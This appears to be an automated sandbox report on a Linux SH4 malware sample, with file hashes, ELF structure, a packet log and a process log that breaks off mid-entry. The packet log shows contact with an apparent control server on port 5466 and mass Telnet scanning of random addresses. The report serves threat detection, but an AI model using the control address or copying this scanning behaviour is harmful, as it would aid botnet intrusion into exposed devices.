              Entropy (8bit):6.777625438824355
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:xd.sh4.elf
              File size:83'248 bytes
              MD5:36584cff9e8b6f567ccbec876174ed0e
              SHA1:a1527c38535889a395d57101ce8e6731099ae9fa
              SHA256:4cba27a0b9f0fa526fad50047b72767853b55ad5bda6636469046486835bd9bc
              SHA512:4bdef0384a810ef1b821655949e51906105600433597bc8e545a0f1ed94d0c330c295b1172f609188f700619d88cd63abb36dc6656d289d14c843689ad8ed4c4
              SSDEEP:1536:S/awroKM0wtC0BYvzL3GgSPGkXv9fs3IYuSyGKKOX+S0upFC69uxAdyQ:SCwnl0KP38GkVf+bw6OYupFoAsQ
              TLSH:3B83BE72D0A8AE68C682467475D8DD3A9F2391C412973EF6A6D0C76A6443EEDF404FF0
              File Content Preview:.ELF..............*.......@.4....C......4. ...(...............@...@..8...8...............@...@B..@B.`...t(..........Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

              Static ELF Info

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
              Machine:<unknown>
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x4001a0
              Flags:0x9
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:82848
              Section Header Size:40
              Number of Section Headers:10
              Header String Table Index:9

              Sections

              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x4000940x940x300x00x6AX004
              .textPROGBITS0x4000e00xe00x111c00x00x6AX0032
              .finiPROGBITS0x4112a00x112a00x240x00x6AX004
              .rodataPROGBITS0x4112c40x112c40x26100x00x2A004
              .ctorsPROGBITS0x4240000x140000x80x00x3WA004
              .dtorsPROGBITS0x4240080x140080x80x00x3WA004
              .dataPROGBITS0x4240140x140140x34c0x00x3WA004
              .bssNOBITS0x4243600x143600x25140x00x3WA004
              .shstrtabSTRTAB0x00x143600x3e0x00x0001

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x4000000x4000000x138d40x138d46.90340x5R E0x10000.init .text .fini .rodata
              LOAD0x140000x4240000x4240000x3600x28742.66840x6RW 0x10000.ctors .dtors .data .bss
              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

              Network Behavior

              Download Network PCAP: filteredfull

              Network Port Distribution

              • Total Packets: 144
              • 5466 undefined
              • 23 (Telnet)
              TimestampSource PortDest PortSource IPDest IP
              Apr 2, 2025 20:48:13.469352007 CEST560025466192.168.2.13213.209.129.92
              Apr 2, 2025 20:48:13.558988094 CEST3794423192.168.2.13152.177.102.169
              Apr 2, 2025 20:48:13.559037924 CEST3794423192.168.2.13148.127.109.169
              Apr 2, 2025 20:48:13.559083939 CEST3794423192.168.2.13199.55.214.174
              Apr 2, 2025 20:48:13.559102058 CEST3794423192.168.2.13173.93.73.222
              Apr 2, 2025 20:48:13.559112072 CEST3794423192.168.2.13182.226.239.207
              Apr 2, 2025 20:48:13.559124947 CEST3794423192.168.2.13240.50.47.31
              Apr 2, 2025 20:48:13.559137106 CEST3794423192.168.2.13222.108.206.164
              Apr 2, 2025 20:48:13.559174061 CEST3794423192.168.2.13141.163.163.151
              Apr 2, 2025 20:48:13.559174061 CEST3794423192.168.2.131.131.92.134
              Apr 2, 2025 20:48:13.559180975 CEST3794423192.168.2.13254.24.37.146
              Apr 2, 2025 20:48:13.559257984 CEST3794423192.168.2.13223.51.198.111
              Apr 2, 2025 20:48:13.559258938 CEST3794423192.168.2.13118.59.160.166
              Apr 2, 2025 20:48:13.559261084 CEST3794423192.168.2.13121.14.215.75
              Apr 2, 2025 20:48:13.559437037 CEST3794423192.168.2.13205.228.153.136
              Apr 2, 2025 20:48:13.559446096 CEST3794423192.168.2.1336.235.188.75
              Apr 2, 2025 20:48:13.559446096 CEST3794423192.168.2.1361.103.199.165
              Apr 2, 2025 20:48:13.559459925 CEST3794423192.168.2.13149.103.43.192
              Apr 2, 2025 20:48:13.559482098 CEST3794423192.168.2.13162.1.112.64
              Apr 2, 2025 20:48:13.559485912 CEST3794423192.168.2.13183.157.118.198
              Apr 2, 2025 20:48:13.559504986 CEST3794423192.168.2.13113.182.54.166
              Apr 2, 2025 20:48:13.559572935 CEST3794423192.168.2.13164.136.54.216
              Apr 2, 2025 20:48:13.559590101 CEST3794423192.168.2.1335.224.125.126
              Apr 2, 2025 20:48:13.559628963 CEST3794423192.168.2.132.194.62.141
              Apr 2, 2025 20:48:13.559632063 CEST3794423192.168.2.13195.228.30.59
              Apr 2, 2025 20:48:13.559632063 CEST3794423192.168.2.13140.239.185.170
              Apr 2, 2025 20:48:13.559634924 CEST3794423192.168.2.13107.226.200.178
              Apr 2, 2025 20:48:13.559637070 CEST3794423192.168.2.13103.238.148.44
              Apr 2, 2025 20:48:13.559645891 CEST3794423192.168.2.1390.242.7.190
              Apr 2, 2025 20:48:13.559663057 CEST3794423192.168.2.13148.103.192.36
              Apr 2, 2025 20:48:13.559669971 CEST3794423192.168.2.13193.185.140.67
              Apr 2, 2025 20:48:13.559734106 CEST3794423192.168.2.1384.245.129.125
              Apr 2, 2025 20:48:13.559736967 CEST3794423192.168.2.13157.230.181.161
              Apr 2, 2025 20:48:13.559740067 CEST3794423192.168.2.1382.108.164.163
              Apr 2, 2025 20:48:13.559751034 CEST3794423192.168.2.1353.198.36.54
              Apr 2, 2025 20:48:13.559760094 CEST3794423192.168.2.139.73.33.143
              Apr 2, 2025 20:48:13.559834003 CEST3794423192.168.2.13178.183.191.180
              Apr 2, 2025 20:48:13.559834957 CEST3794423192.168.2.13216.173.227.244
              Apr 2, 2025 20:48:13.559858084 CEST3794423192.168.2.1398.91.152.18
              Apr 2, 2025 20:48:13.559875965 CEST3794423192.168.2.13159.46.115.179
              Apr 2, 2025 20:48:13.559876919 CEST3794423192.168.2.13183.241.135.71
              Apr 2, 2025 20:48:13.559899092 CEST3794423192.168.2.13195.55.88.62
              Apr 2, 2025 20:48:13.559936047 CEST3794423192.168.2.1367.210.168.0
              Apr 2, 2025 20:48:13.559936047 CEST3794423192.168.2.13192.143.250.212
              Apr 2, 2025 20:48:13.559964895 CEST3794423192.168.2.13188.59.192.117
              Apr 2, 2025 20:48:13.559964895 CEST3794423192.168.2.13166.189.13.125
              Apr 2, 2025 20:48:13.560015917 CEST3794423192.168.2.13175.74.49.93
              Apr 2, 2025 20:48:13.560024023 CEST3794423192.168.2.13149.228.162.41
              Apr 2, 2025 20:48:13.560035944 CEST3794423192.168.2.13180.56.191.19
              Apr 2, 2025 20:48:13.560066938 CEST3794423192.168.2.13208.198.22.217
              Apr 2, 2025 20:48:13.560080051 CEST3794423192.168.2.13171.47.160.33
              Apr 2, 2025 20:48:13.560096025 CEST3794423192.168.2.13161.153.127.76
              Apr 2, 2025 20:48:13.560117960 CEST3794423192.168.2.13219.78.245.146
              Apr 2, 2025 20:48:13.560136080 CEST3794423192.168.2.1319.168.214.115
              Apr 2, 2025 20:48:13.560165882 CEST3794423192.168.2.13174.37.177.44
              Apr 2, 2025 20:48:13.560193062 CEST3794423192.168.2.13153.148.197.55
              Apr 2, 2025 20:48:13.560194016 CEST3794423192.168.2.13123.64.13.116
              Apr 2, 2025 20:48:13.560209036 CEST3794423192.168.2.13136.104.164.124
              Apr 2, 2025 20:48:13.560209036 CEST3794423192.168.2.13240.193.177.97
              Apr 2, 2025 20:48:13.560234070 CEST3794423192.168.2.1319.209.19.163
              Apr 2, 2025 20:48:13.560235023 CEST3794423192.168.2.13217.172.131.73
              Apr 2, 2025 20:48:13.560236931 CEST3794423192.168.2.1319.210.11.41
              Apr 2, 2025 20:48:13.560250044 CEST3794423192.168.2.1397.169.178.141
              Apr 2, 2025 20:48:13.560265064 CEST3794423192.168.2.13120.204.67.235
              Apr 2, 2025 20:48:13.560277939 CEST3794423192.168.2.13156.195.254.51
              Apr 2, 2025 20:48:13.560295105 CEST3794423192.168.2.13117.135.21.34
              Apr 2, 2025 20:48:13.560295105 CEST3794423192.168.2.13116.212.11.48
              Apr 2, 2025 20:48:13.560301065 CEST3794423192.168.2.13253.249.54.108
              Apr 2, 2025 20:48:13.560303926 CEST3794423192.168.2.1391.26.168.171
              Apr 2, 2025 20:48:13.560303926 CEST3794423192.168.2.1384.59.18.151
              Apr 2, 2025 20:48:13.560333014 CEST3794423192.168.2.1393.227.83.65
              Apr 2, 2025 20:48:13.560340881 CEST3794423192.168.2.13125.213.204.39
              Apr 2, 2025 20:48:13.560353041 CEST3794423192.168.2.13156.194.25.68
              Apr 2, 2025 20:48:13.560379982 CEST3794423192.168.2.13187.36.36.0
              Apr 2, 2025 20:48:13.560400963 CEST3794423192.168.2.13172.246.152.35
              Apr 2, 2025 20:48:13.560442924 CEST3794423192.168.2.1370.182.246.7
              Apr 2, 2025 20:48:13.560442924 CEST3794423192.168.2.1371.248.210.125
              Apr 2, 2025 20:48:13.560447931 CEST3794423192.168.2.13189.36.212.25
              Apr 2, 2025 20:48:13.560447931 CEST3794423192.168.2.1381.46.48.249
              Apr 2, 2025 20:48:13.560451984 CEST3794423192.168.2.13211.68.251.108
              Apr 2, 2025 20:48:13.560451984 CEST3794423192.168.2.13126.184.106.140
              Apr 2, 2025 20:48:13.560487032 CEST3794423192.168.2.1346.97.23.38
              Apr 2, 2025 20:48:13.560487032 CEST3794423192.168.2.13125.67.199.137
              Apr 2, 2025 20:48:13.560518026 CEST3794423192.168.2.1363.124.114.177
              Apr 2, 2025 20:48:13.560518026 CEST3794423192.168.2.13255.162.237.222
              Apr 2, 2025 20:48:13.560535908 CEST3794423192.168.2.13248.118.227.61
              Apr 2, 2025 20:48:13.560538054 CEST3794423192.168.2.13203.142.155.151
              Apr 2, 2025 20:48:13.560559034 CEST3794423192.168.2.13165.17.51.26
              Apr 2, 2025 20:48:13.560574055 CEST3794423192.168.2.135.167.247.165
              Apr 2, 2025 20:48:13.560574055 CEST3794423192.168.2.1385.53.45.253
              Apr 2, 2025 20:48:13.560585976 CEST3794423192.168.2.13246.63.127.141
              Apr 2, 2025 20:48:13.560606003 CEST3794423192.168.2.13188.179.236.76
              Apr 2, 2025 20:48:13.560619116 CEST3794423192.168.2.13135.6.73.133
              Apr 2, 2025 20:48:13.560633898 CEST3794423192.168.2.135.124.236.196
              Apr 2, 2025 20:48:13.560643911 CEST3794423192.168.2.1319.201.255.15
              Apr 2, 2025 20:48:13.560672998 CEST3794423192.168.2.13100.26.252.183
              Apr 2, 2025 20:48:13.560683012 CEST3794423192.168.2.13161.35.166.234
              Apr 2, 2025 20:48:13.560694933 CEST3794423192.168.2.13115.181.131.63
              Apr 2, 2025 20:48:13.560745001 CEST3794423192.168.2.13150.225.10.74
              Apr 2, 2025 20:48:13.560749054 CEST3794423192.168.2.13116.135.254.140
              Apr 2, 2025 20:48:13.560759068 CEST3794423192.168.2.13248.78.199.92
              Apr 2, 2025 20:48:13.560786963 CEST3794423192.168.2.1340.140.105.76
              Apr 2, 2025 20:48:13.560792923 CEST3794423192.168.2.13178.177.6.54
              Apr 2, 2025 20:48:13.560794115 CEST3794423192.168.2.13123.4.226.190
              Apr 2, 2025 20:48:13.560801983 CEST3794423192.168.2.13115.126.66.101
              Apr 2, 2025 20:48:13.560826063 CEST3794423192.168.2.13254.129.63.29
              Apr 2, 2025 20:48:13.560826063 CEST3794423192.168.2.1386.126.217.138
              Apr 2, 2025 20:48:13.560827017 CEST3794423192.168.2.1344.233.241.155
              Apr 2, 2025 20:48:13.560827971 CEST3794423192.168.2.1319.57.167.43
              Apr 2, 2025 20:48:13.560832024 CEST3794423192.168.2.1376.36.89.203
              Apr 2, 2025 20:48:13.560832024 CEST3794423192.168.2.1357.94.92.1
              Apr 2, 2025 20:48:13.560867071 CEST3794423192.168.2.13195.15.230.248
              Apr 2, 2025 20:48:13.560867071 CEST3794423192.168.2.1334.0.146.151
              Apr 2, 2025 20:48:13.560888052 CEST3794423192.168.2.13251.155.56.22
              Apr 2, 2025 20:48:13.560900927 CEST3794423192.168.2.1335.200.160.203
              Apr 2, 2025 20:48:13.560900927 CEST3794423192.168.2.1379.176.182.81
              Apr 2, 2025 20:48:13.560900927 CEST3794423192.168.2.139.7.255.81
              Apr 2, 2025 20:48:13.560909986 CEST3794423192.168.2.13113.203.34.23
              Apr 2, 2025 20:48:13.560909986 CEST3794423192.168.2.1365.80.242.225
              Apr 2, 2025 20:48:13.560920954 CEST3794423192.168.2.13105.132.203.33
              Apr 2, 2025 20:48:13.560935974 CEST3794423192.168.2.13128.4.151.94
              Apr 2, 2025 20:48:13.561013937 CEST3794423192.168.2.13146.183.234.233
              Apr 2, 2025 20:48:13.561054945 CEST3794423192.168.2.13222.150.112.61
              Apr 2, 2025 20:48:13.561055899 CEST3794423192.168.2.13107.64.221.118
              Apr 2, 2025 20:48:13.561057091 CEST3794423192.168.2.13113.68.200.52
              Apr 2, 2025 20:48:13.561067104 CEST3794423192.168.2.13152.39.57.159
              Apr 2, 2025 20:48:13.561080933 CEST3794423192.168.2.13172.143.133.21
              Apr 2, 2025 20:48:13.561101913 CEST3794423192.168.2.13103.173.83.138
              Apr 2, 2025 20:48:13.561148882 CEST3794423192.168.2.13211.153.203.5
              Apr 2, 2025 20:48:13.561186075 CEST3794423192.168.2.13206.95.116.52
              Apr 2, 2025 20:48:13.561189890 CEST3794423192.168.2.13211.212.76.94
              Apr 2, 2025 20:48:13.561202049 CEST3794423192.168.2.1341.209.185.137
              Apr 2, 2025 20:48:13.561204910 CEST3794423192.168.2.13191.56.125.48
              Apr 2, 2025 20:48:13.561214924 CEST3794423192.168.2.1371.117.0.55
              Apr 2, 2025 20:48:13.561223984 CEST3794423192.168.2.1347.188.59.32
              Apr 2, 2025 20:48:13.561242104 CEST3794423192.168.2.1319.196.15.45
              Apr 2, 2025 20:48:13.561245918 CEST3794423192.168.2.1382.100.126.238
              Apr 2, 2025 20:48:13.561259985 CEST3794423192.168.2.1340.96.18.177
              Apr 2, 2025 20:48:13.561273098 CEST3794423192.168.2.1340.24.14.62
              Apr 2, 2025 20:48:13.561275959 CEST3794423192.168.2.1398.134.53.71
              Apr 2, 2025 20:48:13.561285019 CEST3794423192.168.2.13191.46.129.2
              Apr 2, 2025 20:48:13.561288118 CEST3794423192.168.2.13203.207.159.169
              Apr 2, 2025 20:48:13.561292887 CEST3794423192.168.2.139.140.25.126
              Apr 2, 2025 20:48:13.561292887 CEST3794423192.168.2.1344.64.134.60
              Apr 2, 2025 20:48:13.561295033 CEST3794423192.168.2.13198.189.238.131
              Apr 2, 2025 20:48:13.561295033 CEST3794423192.168.2.1318.23.138.219
              Apr 2, 2025 20:48:13.561307907 CEST3794423192.168.2.13105.85.237.206
              Apr 2, 2025 20:48:13.721949100 CEST546656002213.209.129.92192.168.2.13
              TimestampSource IPDest IPChecksumCodeType
              Apr 2, 2025 20:48:13.797626972 CEST192.168.1.1192.168.2.13a7c8(Time to live exceeded in transit)Time Exceeded
              Apr 2, 2025 20:48:58.306484938 CEST192.168.2.13192.168.2.18279(Port unreachable)Destination Unreachable
              Apr 2, 2025 20:50:18.321701050 CEST192.168.2.13192.168.2.18279(Port unreachable)Destination Unreachable

              System Behavior

              General

              Start time (UTC):18:48:08
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:/tmp/xd.sh4.elf
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              File Activities

              Process Activities

              System Activities

              Network Activities


              General

              Start time (UTC):18:48:08
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:09
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:09
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:09
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:12
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:12
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:12
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              General

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/bin/journalctl
              Arguments:/usr/bin/journalctl --smart-relinquish-var
              File size:80120 bytes
              MD5 hash:bf3a987344f3bacafc44efd882abda8b

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/pulseaudio
              Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
              File size:100832 bytes
              MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

              File Activities

              Process Activities

              System Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/sbin/gdm3
              Arguments:-
              File size:453296 bytes
              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

              Process Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/etc/gdm3/PrimeOff/Default
              Arguments:/etc/gdm3/PrimeOff/Default
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/sbin/gdm3
              Arguments:-
              File size:453296 bytes
              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

              Process Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/etc/gdm3/PrimeOff/Default
              Arguments:/etc/gdm3/PrimeOff/Default
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/sbin/gdm3
              Arguments:-
              File size:453296 bytes
              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

              Process Activities


              General

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/etc/gdm3/PrimeOff/Default
              Arguments:/etc/gdm3/PrimeOff/Default
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities


              General

              Start time (UTC):18:48:38
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:38
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:38
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              File Activities

              Process Activities

              System Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              File Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              File Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              File Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              File Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
              File size:129816 bytes
